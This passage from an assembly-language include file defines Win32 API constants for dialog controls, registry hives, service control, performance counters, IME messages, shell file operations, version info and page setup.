rad13 equ 42Ch
rad14 equ 42Dh
rad15 equ 42Eh
rad16 equ 42Fh
grp1 equ 430h
grp2 equ 431h
grp3 equ 432h
grp4 equ 433h
frm1 equ 434h
frm2 equ 435h
frm3 equ 436h
frm4 equ 437h
rct1 equ 438h
rct2 equ 439h
rct3 equ 43Ah
rct4 equ 43Bh
ico1 equ 43Ch
ico2 equ 43Dh
ico3 equ 43Eh
ico4 equ 43Fh
stc1 equ 440h
stc2 equ 441h
stc3 equ 442h
stc4 equ 443h
stc5 equ 444h
stc6 equ 445h
stc7 equ 446h
stc8 equ 447h
stc9 equ 448h
stc10 equ 449h
stc11 equ 44Ah
stc12 equ 44Bh
stc13 equ 44Ch
stc14 equ 44Dh
stc15 equ 44Eh
stc16 equ 44Fh
stc17 equ 450h
stc18 equ 451h
stc19 equ 452h
stc20 equ 453h
stc21 equ 454h
stc22 equ 455h
stc23 equ 456h
stc24 equ 457h
stc25 equ 458h
stc26 equ 459h
stc27 equ 45Ah
stc28 equ 45Bh
stc29 equ 45Ch
stc30 equ 45Dh
stc31 equ 45Eh
stc32 equ 45Fh
lst1 equ 460h
lst2 equ 461h
lst3 equ 462h
lst4 equ 463h
lst5 equ 464h
lst6 equ 465h
lst7 equ 466h
lst8 equ 467h
lst9 equ 468h
lst10 equ 469h
lst11 equ 46Ah
lst12 equ 46Bh
lst13 equ 46Ch
lst14 equ 46Dh
lst15 equ 46Eh
lst16 equ 46Fh
cmb1 equ 470h
cmb2 equ 471h
cmb3 equ 472h
cmb4 equ 473h
cmb5 equ 474h
cmb6 equ 475h
cmb7 equ 476h
cmb8 equ 477h
cmb9 equ 478h
cmb10 equ 479h
cmb11 equ 47Ah
cmb12 equ 47Bh
cmb13 equ 47Ch
cmb14 equ 47Dh
cmb15 equ 47Eh
cmb16 equ 47Fh
edt1 equ 480h
edt2 equ 481h
edt3 equ 482h
edt4 equ 483h
edt5 equ 484h
edt6 equ 485h
edt7 equ 486h
edt8 equ 487h
edt9 equ 488h
edt10 equ 489h
edt11 equ 48Ah
edt12 equ 48Bh
edt13 equ 48Ch
edt14 equ 48Dh
edt15 equ 48Eh
edt16 equ 48Fh
scr1 equ 490h
scr2 equ 491h
scr3 equ 492h
scr4 equ 493h
scr5 equ 494h
scr6 equ 495h
scr7 equ 496h
scr8 equ 497h
FILEOPENORD equ 1536
MULTIFILEOPENORD equ 1537
PRINTDLGORD equ 1538
PRNSETUPDLGORD equ 1539
FINDDLGORD equ 1540
REPLACEDLGORD equ 1541
FONTDLGORD equ 1542
FORMATDLGORD31 equ 1543
FORMATDLGORD30 equ 1544
HKEY_CLASSES_ROOT equ 80000000h
HKEY_CURRENT_USER equ 80000001h
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_USERS equ 80000003h
HKEY_PERFORMANCE_DATA equ 80000004h
HKEY_CURRENT_CONFIG equ 80000005h
HKEY_DYN_DATA equ 80000006h
SERVICE_NO_CHANGE equ 0FFFFh
SERVICE_ACTIVE equ 1h
SERVICE_INACTIVE equ 2h
SERVICE_STATE_ALL equ SERVICE_ACTIVE|SERVICE_INACTIVE
SERVICE_CONTROL_STOP equ 1h
SERVICE_CONTROL_PAUSE equ 2h
SERVICE_CONTROL_CONTINUE equ 3h
SERVICE_CONTROL_INTERROGATE equ 4h
SERVICE_CONTROL_SHUTDOWN equ 5h
SERVICE_STOPPED equ 1h
SERVICE_START_PENDING equ 2h
SERVICE_STOP_PENDING equ 3h
SERVICE_RUNNING equ 4h
SERVICE_CONTINUE_PENDING equ 5h
SERVICE_PAUSE_PENDING equ 6h
SERVICE_PAUSED equ 7h
SERVICE_ACCEPT_STOP equ 1h
SERVICE_ACCEPT_PAUSE_CONTINUE equ 2h
SERVICE_ACCEPT_SHUTDOWN equ 4h
SC_MANAGER_CONNECT equ 1h
SC_MANAGER_CREATE_SERVICE equ 2h
SC_MANAGER_ENUMERATE_SERVICE equ 4h
SC_MANAGER_LOCK equ 8h
SC_MANAGER_QUERY_LOCK_STATUS equ 10h
SC_MANAGER_MODIFY_BOOT_CONFIG equ 20h
SC_MANAGER_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SC_MANAGER_CONNECT|SC_MANAGER_CREATE_SERVICE|SC_MANAGER_ENUMERATE_SERVICE|SC_MANAGER_LOCK
SERVICE_QUERY_CONFIG equ 1h
SERVICE_CHANGE_CONFIG equ 2h
SERVICE_QUERY_STATUS equ 4h
SERVICE_ENUMERATE_DEPENDENTS equ 8h
SERVICE_START equ 10h
SERVICE_STOP equ 20h
SERVICE_PAUSE_CONTINUE equ 40h
SERVICE_INTERROGATE equ 80h
SERVICE_USER_DEFINED_CONTROL equ 100h
SERVICE_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SERVICE_QUERY_CONFIG|SERVICE_CHANGE_CONFIG|SERVICE_QUERY_STATUS
PERF_DATA_VERSION equ 1
PERF_DATA_REVISION equ 1
PERF_NO_INSTANCES equ -1
PERF_SIZE_DWORD equ 0h
PERF_SIZE_LARGE equ 100h
PERF_SIZE_ZERO equ 200h
PERF_SIZE_VARIABLE_LEN equ 300h
PERF_TYPE_NUMBER equ 0h
PERF_TYPE_COUNTER equ 400h
PERF_TYPE_TEXT equ 800h
PERF_TYPE_ZERO equ 0C00h
PERF_NUMBER_HEX equ 0h
PERF_NUMBER_DECIMAL equ 10000h
PERF_NUMBER_DEC_1000 equ 20000h
PERF_COUNTER_VALUE equ 0h
PERF_COUNTER_RATE equ 10000h
PERF_COUNTER_FRACTION equ 20000h
PERF_COUNTER_BASE equ 30000h
PERF_COUNTER_ELAPSED equ 40000h
PERF_COUNTER_QUEUELEN equ 50000h
PERF_COUNTER_HISTOGRAM equ 60000h
PERF_TEXT_UNICODE equ 0h
PERF_TEXT_ASCII equ 10000h
PERF_TIMER_TICK equ 0h
PERF_TIMER_100NS equ 100000h
PERF_OBJECT_TIMER equ 200000h
PERF_DELTA_COUNTER equ 400000h
PERF_DELTA_BASE equ 800000h
PERF_INVERSE_COUNTER equ 1000000h
PERF_MULTI_COUNTER equ 2000000h
PERF_DISPLAY_NO_SUFFIX equ 0h
PERF_DISPLAY_PER_SEC equ 10000000h
PERF_DISPLAY_PERCENT equ 20000000h
PERF_DISPLAY_SECONDS equ 30000000h
PERF_DISPLAY_NOSHOW equ 40000000h
PERF_COUNTER_COUNTER equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_PER_SEC
PERF_COUNTER_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_QUEUELEN_TYPE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_QUEUELEN|PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_NO_SUFFIX
PERF_COUNTER_BULK_COUNT equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_PER_SEC
PERF_COUNTER_TEXT equ PERF_SIZE_VARIABLE_LEN|PERF_TYPE_TEXT|PERF_TEXT_UNICODE|PERF_DISPLAY_NO_SUFFIX
PERF_COUNTER_RAWCOUNT equ PERF_SIZE_DWORD|PERF_TYPE_NUMBER|PERF_NUMBER_DECIMAL|PERF_DISPLAY_NO_SUFFIX
PERF_SAMPLE_FRACTION equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|PERF_DELTA_COUNTER|PERF_DELTA_BASE|PERF_DISPLAY_PERCENT
PERF_SAMPLE_COUNTER equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_NO_SUFFIX
PERF_COUNTER_NODATA equ PERF_SIZE_ZERO|PERF_DISPLAY_NOSHOW
PERF_COUNTER_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_INVERSE_COUNTER|PERF_DISPLAY_PERCENT
PERF_SAMPLE_BASE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_DISPLAY_NOSHOW|1h
PERF_AVERAGE_TIMER equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|PERF_DISPLAY_SECONDS
PERF_AVERAGE_BASE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_DISPLAY_NOSHOW|2h
PERF_AVERAGE_BULK equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|PERF_DISPLAY_NOSHOW
PERF_100NSEC_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_100NS|PERF_DELTA_COUNTER|PERF_DISPLAY_PERCENT
PERF_100NSEC_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_100NS|PERF_DELTA_COUNTER|PERF_INVERSE_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_MULTI_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_DELTA_COUNTER|PERF_TIMER_TICK|PERF_MULTI_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_MULTI_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_DELTA_COUNTER|PERF_MULTI_COUNTER|PERF_TIMER_TICK|PERF_INVERSE_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_MULTI_BASE equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_MULTI_COUNTER|PERF_DISPLAY_NOSHOW
PERF_100NSEC_MULTI_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_DELTA_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_100NS|PERF_MULTI_COUNTER|PERF_DISPLAY_PERCENT
PERF_100NSEC_MULTI_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_DELTA_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_100NS|PERF_MULTI_COUNTER|PERF_INVERSE_COUNTER|PERF_DISPLAY_PERCENT
PERF_RAW_FRACTION equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|PERF_DISPLAY_PERCENT
PERF_RAW_BASE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_DISPLAY_NOSHOW|3h
PERF_ELAPSED_TIME equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_ELAPSED|PERF_OBJECT_TIMER|PERF_DISPLAY_SECONDS
PERF_COUNTER_HISTOGRAM_TYPE equ 80000000h
PERF_DETAIL_NOVICE equ 100
PERF_DETAIL_ADVANCED equ 200
PERF_DETAIL_EXPERT equ 300
PERF_DETAIL_WIZARD equ 400
PERF_NO_UNIQUE_ID equ -1
LZERROR_BADINHANDLE equ -1
LZERROR_BADOUTHANDLE equ -2
LZERROR_READ equ -3
LZERROR_WRITE equ -4
LZERROR_PUBLICLOC equ -5
LZERROR_GLOBLOCK equ -6
LZERROR_BADVALUE equ -7
LZERROR_UNKNOWNALG equ -8
VK_PROCESSKEY equ 0E5h
STYLE_DESCRIPTION_SIZE equ 32
WM_CONVERTREQUESTEX equ 108h
WM_IME_STARTCOMPOSITION equ 10Dh
WM_IME_ENDCOMPOSITION equ 10Eh
WM_IME_COMPOSITION equ 10Fh
WM_IME_KEYLAST equ 10Fh
WM_IME_SETCONTEXT equ 281h
WM_IME_NOTIFY equ 282h
WM_IME_CONTROL equ 283h
WM_IME_COMPOSITIONFULL equ 284h
WM_IME_SELECT equ 285h
WM_IME_CHAR equ 286h
WM_IME_KEYDOWN equ 290h
WM_IME_KEYUP equ 291h
IMC_GETCANDIDATEPOS equ 7h
IMC_SETCANDIDATEPOS equ 8h
IMC_GETCOMPOSITIONFONT equ 9h
IMC_SETCOMPOSITIONFONT equ 0Ah
IMC_GETCOMPOSITIONWINDOW equ 0Bh
IMC_SETCOMPOSITIONWINDOW equ 0Ch
IMC_GETSTATUSWINDOWPOS equ 0Fh
IMC_SETSTATUSWINDOWPOS equ 10h
IMC_CLOSESTATUSWINDOW equ 21h
IMC_OPENSTATUSWINDOW equ 22h
NI_OPENCANDIDATE equ 10h
NI_CLOSECANDIDATE equ 11h
NI_SELECTCANDIDATESTR equ 12h
NI_CHANGECANDIDATELIST equ 13h
NI_FINALIZECONVERSIONRESULT equ 14h
NI_COMPOSITIONSTR equ 15h
NI_SETCANDIDATE_PAGESTART equ 16h
NI_SETCANDIDATE_PAGESIZE equ 17h
ISC_SHOWUICANDIDATEWINDOW equ 1h
ISC_SHOWUICOMPOSITIONWINDOW equ 80000000h
ISC_SHOWUIGUIDELINE equ 40000000h
ISC_SHOWUIALLCANDIDATEWINDOW equ 0Fh
ISC_SHOWUIALL equ 0C000000Fh
CPS_COMPLETE equ 1h
CPS_CONVERT equ 2h
CPS_REVERT equ 3h
CPS_CANCEL equ 4h
IME_CHOTKEY_IME_NONIME_TOGGLE equ 10h
IME_CHOTKEY_SHAPE_TOGGLE equ 11h
IME_CHOTKEY_SYMBOL_TOGGLE equ 12h
IME_JHOTKEY_CLOSE_OPEN equ 30h
IME_KHOTKEY_SHAPE_TOGGLE equ 50h
IME_KHOTKEY_HANJACONVERT equ 51h
IME_KHOTKEY_ENGLISH equ 52h
IME_THOTKEY_IME_NONIME_TOGGLE equ 70h
IME_THOTKEY_SHAPE_TOGGLE equ 71h
IME_THOTKEY_SYMBOL_TOGGLE equ 72h
IME_HOTKEY_DSWITCH_FIRST equ 100h
IME_HOTKEY_DSWITCH_LAST equ 11Fh
IME_ITHOTKEY_RESEND_RESULTSTR equ 200h
IME_ITHOTKEY_PREVIOUS_COMPOSITION equ 201h
IME_ITHOTKEY_UISTYLE_TOGGLE equ 202h
GCS_COMPREADSTR equ 1h
GCS_COMPREADATTR equ 2h
GCS_COMPREADCLAUSE equ 4h
GCS_COMPSTR equ 8h
GCS_COMPATTR equ 10h
GCS_COMPCLAUSE equ 20h
GCS_CURSORPOS equ 80h
GCS_DELTASTART equ 100h
GCS_RESULTREADSTR equ 200h
GCS_RESULTREADCLAUSE equ 400h
GCS_RESULTSTR equ 800h
GCS_RESULTCLAUSE equ 1000h
CS_INSERTCHAR equ 2000h
CS_NOMOVECARET equ 4000h
IME_PROP_AT_CARET equ 10000h
IME_PROP_SPECIAL_UI equ 20000h
IME_PROP_CANDLIST_START_FROM_1 equ 40000h
IME_PROP_UNICODE equ 80000h
UI_CAP_2700 equ 1h
UI_CAP_ROT90 equ 2h
UI_CAP_ROTANY equ 4h
SCS_CAP_COMPSTR equ 1h
SCS_CAP_MAKEREAD equ 2h
SELECT_CAP_CONVERSION equ 1h
SELECT_CAP_SENTENCE equ 2h
GGL_LEVEL equ 1h
GGL_INDEX equ 2h
GGL_STRING equ 3h
GGL_PRIVATE equ 4h
GL_LEVEL_NOGUIDELINE equ 0h
GL_LEVEL_FATAL equ 1h
GL_LEVEL_ERROR equ 2h
GL_LEVEL_WARNING equ 3h
GL_LEVEL_INFORMATION equ 4h
GL_ID_UNKNOWN equ 0h
GL_ID_NOMODULE equ 1h
GL_ID_NODICTIONARY equ 10h
GL_ID_CANNOTSAVE equ 11h
GL_ID_NOCONVERT equ 20h
GL_ID_TYPINGERROR equ 21h
GL_ID_TOOMANYSTROKE equ 22h
GL_ID_READINGCONFLICT equ 23h
GL_ID_INPUTREADING equ 24h
GL_ID_INPUTRADICAL equ 25h
GL_ID_INPUTCODE equ 26h
GL_ID_INPUTSYMBOL equ 27h
GL_ID_CHOOSECANDIDATE equ 28h
GL_ID_REVERSECONVERSION equ 29h
GL_ID_PRIVATE_FIRST equ 8000h
GL_ID_PRIVATE_LAST equ 0FFFFh
IGP_PROPERTY equ 4h
IGP_CONVERSION equ 8h
IGP_SENTENCE equ 0Ch
IGP_UI equ 10h
IGP_SETCOMPSTR equ 14h
IGP_SELECT equ 18h
SCS_SETSTR equ GCS_COMPREADSTR|GCS_COMPSTR
SCS_CHANGEATTR equ GCS_COMPREADATTR|GCS_COMPATTR
SCS_CHANGECLAUSE equ GCS_COMPREADCLAUSE|GCS_COMPCLAUSE
ATTR_INPUT equ 0h
ATTR_TARGET_CONVERTED equ 1h
ATTR_CONVERTED equ 2h
ATTR_TARGET_NOTCONVERTED equ 3h
ATTR_INPUT_ERROR equ 4h
CFS_DEFAULT equ 0h
CFS_RECT equ 1h
CFS_POINT equ 2h
CFS_SCREEN equ 4h
CFS_FORCE_POSITION equ 20h
CFS_CANDIDATEPOS equ 40h
CFS_EXCLUDE equ 80h
GCL_CONVERSION equ 1h
GCL_REVERSECONVERSION equ 2h
GCL_REVERSE_LENGTH equ 3h
IME_CMODE_ALPHANUMERIC equ 0h
IME_CMODE_NATIVE equ 1h
IME_CMODE_CHINESE equ IME_CMODE_NATIVE
IME_CMODE_HANGEUL equ IME_CMODE_NATIVE
IME_CMODE_JAPANESE equ IME_CMODE_NATIVE
IME_CMODE_KATAKANA equ 2h
IME_CMODE_LANGUAGE equ 3h
IME_CMODE_FULLSHAPE equ 8h
IME_CMODE_ROMAN equ 10h
IME_CMODE_CHARCODE equ 20h
IME_CMODE_HANJACONVERT equ 40h
IME_CMODE_SOFTKBD equ 80h
IME_CMODE_NOCONVERSION equ 100h
IME_CMODE_EUDC equ 200h
IME_CMODE_SYMBOL equ 400h
IME_SMODE_NONE equ 0h
IME_SMODE_PLAURALCLAUSE equ 1h
IME_SMODE_SINGLECONVERT equ 2h
IME_SMODE_AUTOMATIC equ 4h
IME_SMODE_PHRASEPREDICT equ 8h
IME_CAND_UNKNOWN equ 0h
IME_CAND_READ equ 1h
IME_CAND_CODE equ 2h
IME_CAND_MEANING equ 3h
IME_CAND_RADICAL equ 4h
IME_CAND_STROKE equ 5h
IMN_CLOSESTATUSWINDOW equ 1h
IMN_OPENSTATUSWINDOW equ 2h
IMN_CHANGECANDIDATE equ 3h
IMN_CLOSECANDIDATE equ 4h
IMN_OPENCANDIDATE equ 5h
IMN_SETCONVERSIONMODE equ 6h
IMN_SETSENTENCEMODE equ 7h
IMN_SETOPENSTATUS equ 8h
IMN_SETCANDIDATEPOS equ 9h
IMN_SETCOMPOSITIONFONT equ 0Ah
IMN_SETCOMPOSITIONWINDOW equ 0Bh
IMN_SETSTATUSWINDOWPOS equ 0Ch
IMN_GUIDELINE equ 0Dh
IMN_PRIVATE equ 0Eh
IMM_ERROR_NODATA equ -1
IMM_ERROR_GENERAL equ -2
IME_CONFIG_GENERAL equ 1
IME_CONFIG_REGISTERWORD equ 2
IME_CONFIG_SELECTDICTIONARY equ 3
IME_ESC_QUERY_SUPPORT equ 3h
IME_ESC_RESERVED_FIRST equ 4h
IME_ESC_RESERVED_LAST equ 7FFh
IME_ESC_PRIVATE_FIRST equ 800h
IME_ESC_PRIVATE_LAST equ 0FFFh
IME_ESC_SEQUENCE_TO_INTERNAL equ 1001h
IME_ESC_GET_EUDC_DICTIONARY equ 1003h
IME_ESC_SET_EUDC_DICTIONARY equ 1004h
IME_ESC_MAX_KEY equ 1005h
IME_ESC_IME_NAME equ 1006h
IME_ESC_SYNC_HOTKEY equ 1007h
IME_ESC_HANJA_MODE equ 1008h
IME_REGWORD_STYLE_EUDC equ 1h
IME_REGWORD_STYLE_USER_FIRST equ 80000000h
IME_REGWORD_STYLE_USER_LAST equ 0FFFFh
SOFTKEYBOARD_TYPE_T1 equ 1h
SOFTKEYBOARD_TYPE_C1 equ 2h
DIALOPTION_BILLING equ 40h
DIALOPTION_QUIET equ 80h
DIALOPTION_DIALTONE equ 100h
MDMVOLFLAG_LOW equ 1h
MDMVOLFLAG_MEDIUM equ 2h
MDMVOLFLAG_HIGH equ 4h
MDMVOL_LOW equ 0h
MDMVOL_MEDIUM equ 1h
MDMVOL_HIGH equ 2h
MDMSPKRFLAG_OFF equ 1h
MDMSPKRFLAG_DIAL equ 2h
MDMSPKRFLAG_ON equ 4h
MDMSPKRFLAG_CALLSETUP equ 8h
MDMSPKR_OFF equ 0h
MDMSPKR_DIAL equ 1h
MDMSPKR_ON equ 2h
MDMSPKR_CALLSETUP equ 3h
MDM_COMPRESSION equ 1h
MDM_ERROR_CONTROL equ 2h
MDM_FORCED_EC equ 4h
MDM_CELLULAR equ 8h
MDM_FLOWCONTROL_HARD equ 10h
MDM_FLOWCONTROL_SOFT equ 20h
MDM_CCITT_OVERRIDE equ 40h
MDM_SPEED_ADJUST equ 80h
MDM_TONE_DIAL equ 100h
MDM_BLIND_DIAL equ 200h
MDM_V23_OVERRIDE equ 400h
ABM_NEW equ 0h
ABM_REMOVE equ 1h
ABM_QUERYPOS equ 2h
ABM_SETPOS equ 3h
ABM_GETSTATE equ 4h
ABM_GETTASKBARPOS equ 5h
ABM_ACTIVATE equ 6h
ABM_GETAUTOHIDEBAR equ 7h
ABM_SETAUTOHIDEBAR equ 8h
ABM_WINDOWPOSCHANGED equ 9h
ABN_STATECHANGE equ 0h
ABN_POSCHANGED equ 1h
ABN_FULLSCREENAPP equ 2h
ABN_WINDOWARRANGE equ 3h
ABS_AUTOHIDE equ 1h
ABS_ALWAYSONTOP equ 2h
ABE_LEFT equ 0
ABE_TOP equ 1
ABE_RIGHT equ 2
ABE_BOTTOM equ 3
EIRESID equ -1
FO_MOVE equ 1h
FO_COPY equ 2h
FO_DELETE equ 3h
FO_RENAME equ 4h
FOF_MULTIDESTFILES equ 1h
FOF_CONFIRMMOUSE equ 2h
FOF_SILENT equ 4h
FOF_RENAMEONCOLLISION equ 8h
FOF_NOCONFIRMATION equ 10h
FOF_WANTMAPPINGHANDLE equ 20h
FOF_ALLOWUNDO equ 40h
FOF_FILESONLY equ 80h
FOF_SIMPLEPROGRESS equ 100h
FOF_NOCONFIRMMKDIR equ 200h
PO_DELETE equ 13h
PO_RENAME equ 14h
PO_PORTCHANGE equ 20h
PO_REN_PORT equ 34h
SE_ERR_FNF equ 2
SE_ERR_PNF equ 3
SE_ERR_ACCESSDENIED equ 5
SE_ERR_OOM equ 8
SE_ERR_DLLNOTFOUND equ 32
SEE_MASK_CLASSNAME equ 1h
SEE_MASK_CLASSKEY equ 3h
SEE_MASK_IDLIST equ 4h
SEE_MASK_INVOKEIDLIST equ 0Ch
SEE_MASK_ICON equ 10h
SEE_MASK_HOTKEY equ 20h
SEE_MASK_NOCLOSEPROCESS equ 40h
SEE_MASK_CONNECTNETDRV equ 80h
SEE_MASK_FLAG_DDEWAIT equ 100h
SEE_MASK_DOENVSUBST equ 200h
SEE_MASK_FLAG_NO_UI equ 400h
NIM_ADD equ 0h
NIM_MODIFY equ 1h
NIM_DELETE equ 2h
NIF_MESSAGE equ 1h
NIF_ICON equ 2h
NIF_TIP equ 4h
SHGFI_ICON equ 100h
SHGFI_DISPLAYNAME equ 200h
SHGFI_TYPENAME equ 400h
SHGFI_ATTRIBUTES equ 800h
SHGFI_ICONLOCATION equ 1000h
SHGFI_EXETYPE equ 2000h
SHGFI_SYSICONINDEX equ 4000h
SHGFI_LINKOVERLAY equ 8000h
SHGFI_SELECTED equ 10000h
SHGFI_LARGEICON equ 0h
SHGFI_SMALLICON equ 1h
SHGFI_OPENICON equ 2h
SHGFI_SHELLICONSIZE equ 4h
SHGFI_PIDL equ 8h
SHGFI_USEFILEATTRIBUTES equ 10h
SHGNLI_PIDL equ 1h
SHGNLI_PREFIXNAME equ 2h
VS_VERSION_INFO equ 1
VS_USER_DEFINED equ 100
VS_FFI_SIGNATURE equ 0FEEF04BDh
VS_FFI_STRUCVERSION equ 10000h
VS_FFI_FILEFLAGSMASK equ 3Fh
VS_FF_DEBUG equ 1h
VS_FF_PRERELEASE equ 2h
VS_FF_PATCHED equ 4h
VS_FF_PRIVATEBUILD equ 8h
VS_FF_INFOINFERRED equ 10h
VS_FF_SPECIALBUILD equ 20h
VOS_UNKNOWN equ 0h
VOS_DOS equ 10000h
VOS_OS216 equ 20000h
VOS_OS232 equ 30000h
VOS_NT equ 40000h
VOS__BASE equ 0h
VOS__WINDOWS16 equ 1h
VOS__PM16 equ 2h
VOS__PM32 equ 3h
VOS__WINDOWS32 equ 4h
VOS_DOS_WINDOWS16 equ 10001h
VOS_DOS_WINDOWS32 equ 10004h
VOS_OS216_PM16 equ 20002h
VOS_OS232_PM32 equ 30003h
VOS_NT_WINDOWS32 equ 40004h
VFT_UNKNOWN equ 0h
VFT_APP equ 1h
VFT_DLL equ 2h
VFT_DRV equ 3h
VFT_FONT equ 4h
VFT_VXD equ 5h
VFT_STATIC_LIB equ 7h
VFT2_UNKNOWN equ 0h
VFT2_DRV_PRINTER equ 1h
VFT2_DRV_KEYBOARD equ 2h
VFT2_DRV_LANGUAGE equ 3h
VFT2_DRV_DISPLAY equ 4h
VFT2_DRV_MOUSE equ 5h
VFT2_DRV_NETWORK equ 6h
VFT2_DRV_SYSTEM equ 7h
VFT2_DRV_INSTALLABLE equ 8h
VFT2_DRV_SOUND equ 9h
VFT2_DRV_COMM equ 0Ah
VFT2_DRV_INPUTMETHOD equ 0Bh
VFT2_FONT_RASTER equ 1h
VFT2_FONT_VECTOR equ 2h
VFT2_FONT_TRUETYPE equ 3h
VFFF_ISSHAREDFILE equ 1h
VFF_CURNEDEST equ 1h
VFF_FILEINUSE equ 2h
VFF_BUFFTOOSMALL equ 4h
VIFF_FORCEINSTALL equ 1h
VIFF_DONTDELETEOLD equ 2h
VIF_TEMPFILE equ 1h
VIF_MISMATCH equ 2h
VIF_SRCOLD equ 4h
VIF_DIFFLANG equ 8h
VIF_DIFFCODEPG equ 10h
VIF_DIFFTYPE equ 20h
VIF_WRITEPROT equ 40h
VIF_FILEINUSE equ 80h
VIF_OUTOFSPACE equ 100h
VIF_ACCESSVIOLATION equ 200h
VIF_SHARINGVIOLATION equ 400h
VIF_CANNOTCREATE equ 800h
VIF_CANNOTDELETE equ 1000h
VIF_CANNOTRENAME equ 2000h
VIF_CANNOTDELETECUR equ 4000h
VIF_OUTOFMEMORY equ 8000h
VIF_CANNOTREADSRC equ 10000h
VIF_CANNOTREADDST equ 20000h
VIF_BUFFTOOSMALL equ 40000h
PROCESS_HEAP_REGION equ 1h
PROCESS_HEAP_UNCOMMITTED_RANGE equ 2h
PROCESS_HEAP_ENTRY_BUSY equ 4h
PROCESS_HEAP_ENTRY_MOVEABLE equ 10h
PROCESS_HEAP_ENTRY_DDESHARE equ 20h
SCS_32BIT_BINARY equ 0
SCS_DOS_BINARY equ 1
SCS_WOW_BINARY equ 2
SCS_PIF_BINARY equ 3
SCS_POSIX_BINARY equ 4
SCS_OS216_BINARY equ 5
LOGON32_LOGON_INTERACTIVE equ 2
LOGON32_LOGON_BATCH equ 4
LOGON32_LOGON_SERVICE equ 5
LOGON32_PROVIDER_DEFAULT equ 0
LOGON32_PROVIDER_WINNT35 equ 1
VER_PLATFORM_WIN32s equ 0
VER_PLATFORM_WIN32_WINDOWS equ 1
VER_PLATFORM_WIN32_NT equ 2
AC_LINE_OFFLINE equ 0h
AC_LINE_ONLINE equ 1h
AC_LINE_BACKUP_POWER equ 2h
AC_LINE_UNKNOWN equ 0FFh
BATTERY_FLAG_HIGH equ 1h
BATTERY_FLAG_LOW equ 2h
BATTERY_FLAG_CRITICAL equ 4h
BATTERY_FLAG_CHARGING equ 8h
BATTERY_FLAG_NO_BATTERY equ 80h
BATTERY_FLAG_UNKNOWN equ 0FFh
BATTERY_PERCENTAGE_UNKNOWN equ 0FFh
BATTERY_LIFE_UNKNOWN equ 0FFFFh
CDM_FIRST equ WM_USER+100
CDM_LAST equ WM_USER+200
CDM_GETSPEC equ CDM_FIRST+0h
CDM_GETFILEPATH equ CDM_FIRST+1h
CDM_GETFOLDERPATH equ CDM_FIRST+2h
CDM_GETFOLDERIDLIST equ CDM_FIRST+3h
CDM_SETCONTROLTEXT equ CDM_FIRST+4h
CDM_HIDECONTROL equ CDM_FIRST+5h
CDM_SETDEFEXT equ CDM_FIRST+6h
SIMULATED_FONTTYPE equ 8000h
PRINTER_FONTTYPE equ 4000h
SCREEN_FONTTYPE equ 2000h
BOLD_FONTTYPE equ 100h
ITALIC_FONTTYPE equ 200h
REGULAR_FONTTYPE equ 400h
WM_PSD_PAGESETUPDLG equ WM_USER
WM_PSD_FULLPAGERECT equ WM_USER+1
WM_PSD_MINMARGINRECT equ WM_USER+2
WM_PSD_MARGINRECT equ WM_USER+3
WM_PSD_GREEKTEXTRECT equ WM_USER+4
WM_PSD_ENVSTAMPRECT equ WM_USER+5
WM_PSD_YAFULLPAGERECT equ WM_USER+6
PSD_DEFAULTMINMARGINS equ 0h
PSD_INWININIINTLMEASURE equ 0h
PSD_MINMARGINS equ 1h
PSD_MARGINS equ 2h
PSD_INTHOUSANDTHSOFINCHES equ 4h
PSD_INHUNDREDTHSOFMILLIMETERS equ 8h
PSD_DISABLEMARGINS equ 10h
PSD_DISABLEPRINTER equ 20h
PSD_NOWARNING equ 80h
PSD_DISABLEORIENTATION equ 100h
PSD_RETURNDEFAULT equ 400h
PSD_DISABLEPAPER equ 200h
PSD_SHOWHELP equ 800h
PSD_ENABLEPAGESETUPHOOK equ 2000h
PSD_ENABLEPAGESETUPTEMPLATE equ 8000h
